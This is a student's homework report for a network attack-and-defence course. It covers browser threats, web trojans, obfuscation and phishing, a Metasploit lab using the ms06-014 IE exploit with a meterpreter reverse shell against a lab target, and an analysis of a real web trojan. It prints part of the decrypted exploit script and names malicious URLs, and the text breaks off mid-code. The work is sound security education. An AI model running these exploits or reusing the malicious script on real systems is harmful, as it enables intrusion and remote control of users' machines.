20199107 2019-2020-2 《网络攻防实践》第12周作业

20199107 2019-2020-2 《网络攻防实践》第12周作业

这个作业属于哪个课程	《网络攻防实践》
这个作业的要求在哪里	《网络攻防实践》第11次作业
我在这个课程的目标是	学习新知识、考试拿高分
这个作业在哪个具体方面帮助我实现目标	学习浏览器安全攻防知识
作业正文	见下文
其他参考文献	见文末

1.实践内容

web浏览器技术发展与安全威胁

• web浏览器软件的安全困境三要素

  • 复杂性：需要支持HTTP、HTTPS、FTP等多种应用层协议，需要符合HTML、XHTML、CSS等一系列页面标准规范，需要支持JavaScript、flash、Java、silverlight等多种客户端执行环境，规模复杂而庞大，也带来了更多安全缺陷

  • 可扩展性：现代web浏览器可能是最突出可扩展特性支持的软件类型，几乎所有浏览器都支持第三方插件，而插件也会带来漏洞

  • 连通性：浏览器基本上始终工作在联网状态，一旦有漏洞，可能会被网络上的威胁源利用攻击

• web浏览安全威胁位置

  • 针对传输网络的网络协议安全威胁

  • 针对web浏览端系统平台的安全威胁

  • 针对web浏览器软件及插件程序的渗透攻击威胁

  • 针对互联网用户的社会工程学攻击威胁

web浏览端的渗透攻击威胁——网页木马

• 驱动力：黑客地下经济链，其角色包括：病毒编写者、黑站长/网站骇客、“信封”盗窃者、 虚拟资产盗窃者、 虚拟资产卖家、玩家

• 技术基础：web浏览端安全漏洞

  • web浏览器自身及其插件的漏洞

  • 操作系统的漏洞

  • 其他影响范围大的漏洞

• 攻击流程
  

• 网页木马的机理分析

  • 定义特性：本质上是利用了现代浏览器支持客户端脚本执行的能力，针对web浏览端软件安全漏洞攻击

  • 复杂、难以应对的原因：

    • 多样化的客户端渗透攻击位置和技术类型

    • 分布式、复杂的微观链接结构

    • 灵活多变的混淆与对抗分析能力

• 网页挂马机制：将网页木马挂到有一定流量的网页的过程

  • 内嵌HTML标签：常引用中间跳转站点进行隐藏，最常使用iframe标签，也常用frame、body标签的onload事件、在CSS标签中包含网页木马链接等

  • 恶意script脚本：利用script标签外部引用脚本，跳转脚本常用动态生成的包含网页木马的iframe标签，或用windows.open函数弹出新的窗口链接木马

  • 内嵌对象链接：利用图片、flash等内嵌对象的特定方法加载指定页面

  • ARP欺骗挂马：不需要真正攻陷目标网站，而是利用ARP欺骗，进行中间人攻击，劫持所有进出目标网站的流量，并在目标网站HTML反馈包注入恶意脚本

• 混淆机制：网页木马反抗检测和分析的技术，也称免杀

  • 代码重新排版，去除缩进、空格、换行、注释等，将变量名用随机字符串代替

  • 通过大小写变换、十六进制编码、escape编码、unicode编码等方法对网页木马进行编码混淆

  • 通过通用或定制的加密工具对网页木马进行加密得到密文，然后使用脚本语言中包含的解密函数，对密文进行解密，再使用document.write()或eval()进行动态输出或执行

  • 利用字符串运算、数学运算或特殊函数，例如通过字符串替换函数将网页木马中的一些字符替换为其他字符构成混淆后代码，然后在运行时首先替换回原先的字符，然后进行动态执行

  • 修改网页木马文件掩码欺骗反病毒软件，或对网页木马文件结构进行混淆，来伪装正常文件，将网页木马代码拆分至多个文件等

• 检测与分析技术

  • 基于特征码匹配的传统检测方法

  • 基于统计与机器学习的静态分析方法

  • 基于动态行为结果判定的检测分析方法

  • 基于模拟浏览器环境的动态分析检测方法

网络钓鱼

• 概述：用自动化的社会工程学手段欺骗别人给出口令或其他敏感信息

• 技术内幕

  • 普遍技术流程：

    • 扫描网段寻找有漏洞的服务器

    • 攻陷服务器，安装Rootkit或口令保护的后门

    • 通过后门获取服务器访问权，并搭建钓鱼网页

    • 用群发电子邮件工具大规模散发欺骗邮件

    • 流量到达钓鱼网站，通过后台脚本收集受害者敏感信息

  • 欺骗技巧：

    • 使用IP地址代替域名

    • 注册发音或形似的DNS域名，并架设假网站

    • 在假冒钓鱼网站的电子邮件中加入大量指向真实目标网站的链接

    • 对假冒网站URL进行编码或混淆

    • 攻击浏览器软件的漏洞，使之隐藏消息内容的实质

    • 将假冒的钓鱼网站配置成记录用户提交的所有数据并进行不可察觉的日志，然后将用户重定向到真实的网站

    • 架设一个假冒网站作为真实网站的代理，偷偷记录未使用SSL加密保护的口令等敏感信息，甚至为假域名注册一个有效的SSL证书记录所有流量中的敏感信息

    • 通过恶意代码在受害者主机安装一个恶意浏览器助手，将受害者重定向到假冒钓鱼网站

    • 通过恶意代码修改受害者主机的hosts文件

• 防范技巧

  • 提高警惕，不轻信邮件

  • 充分利用浏览器、网络安全厂商提供的反钓鱼网站功能特性

  • 访问可进行在线金融操作的网站，最好直接用域名访问，最好用U盾代替软证书或口令

  • 通过学习提高自身抗社工攻击能力

2.实践过程

web浏览器渗透攻击实验

任务：使用攻击机和Windows靶机进行浏览器渗透攻击实验，体验网络木马构造及实施浏览器攻击的实际过程

机器	角色	IP
kali-Linux	攻击机	192.168.200.2
win2kServer	靶机	192.168.200.124

kali用msfconsole启动Metasploit
search ms06-014找到实验要用的攻击模块，use exploit/windows/browser/ie_createobject使用该模块

show payloads查看payload，然后set payload windows/meterpreter/reverse_tcp选择payload
show options查看参数，set LHOST 192.168.200.2设置攻击机IP为kali的IP，其他用默认

exploit执行攻击，之后复制一下生成的挂马网页URLhttp://192.168.200.2:8080/jE1Nmb7AVguiz（这是做完才截的图，所以已经有个session了）

用靶机访问该页，之后kali处会获得一个sessions

用sessions -i 1可以获得meterpreter命令行，其中1为session ID

剖析一个实际的网页木马攻击场景

不看参考答案做不出来，难受啊

• 1.你是如何一步步从所给网页获取最后的真实代码的？

因为教材的参考网站已经废弃了，然后从提供的资料里又找不到找不到start.htm和new09.htm，就只好跳过这两个
随便找个在线md5加密，求一下对应的32位md5值

通过hash值找到该文件，改文件后缀后，可用记事本打开查看

通过以上方式可以从网页找到混淆后的源代码，之后就是想办法去掉混淆了

• 2.网页和JavaScript代码中都使用了什么加密方法？你是如何解密的？

http://js.users.51.la/1299644.js打开直接看到一句：“本文件内容是流量统计代码，不是木马”
http://aa.18dd.net/aa/kl.htm就是上图，红框框起来的那行可见加密方式xxtea+base64编码，以及十六进制口令
没有找到有效的在线加解密工具，但找到了不少源代码，可以编译调试一下，但既然有答案那我还是看答案吧，
解密出来是一堆十六进制数，再将十六进制数转为字符

除了以上的xxtea+base64，16进制加密，后面还用到了8进制加密，js加密，escape加密等方法，都可以找对应的工具解决

• 3.从解密结果来看，攻击者构造的网页木马利用了哪些安全漏洞？

解密结果如下

function init(){document.write();}
window.onload = init;
if(document.cookie.indexOf('OK')==-1){
try{var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie='ce=windowsxp;path=/;expires='+expires.toGMTString();
if(e!="[object Error]"){
document.write("